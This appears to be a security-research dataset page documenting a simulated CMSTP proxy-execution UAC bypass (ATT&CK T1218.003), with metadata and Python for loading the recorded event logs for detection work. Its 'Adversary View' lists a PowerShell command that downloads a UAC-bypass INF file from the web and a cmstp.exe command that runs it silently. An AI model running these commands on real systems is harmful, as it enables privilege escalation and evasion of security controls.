CMSTP Proxy Execution

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/22

Modification Date

2020/10/22

Tactics

TA0005

Techniques

T1218.003

Tags

art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0

Dataset Description

This dataset represents threat actors leveraging CMSTP to execute an Inf file to proxy execute other malicious commands (i.e. cmd.exe). (Embedding commands in the RunPreSetupCommandsSection of the INF file).

Simulation Metadata

Tools

type

Name

Module

Manual

powershell

powershell

Adversary View

Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile C:\ProgramData\T1218.003_uacbypass.inf
cmstp.exe /s C:\ProgramData\T1218.003_uacbypass.inf /au

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)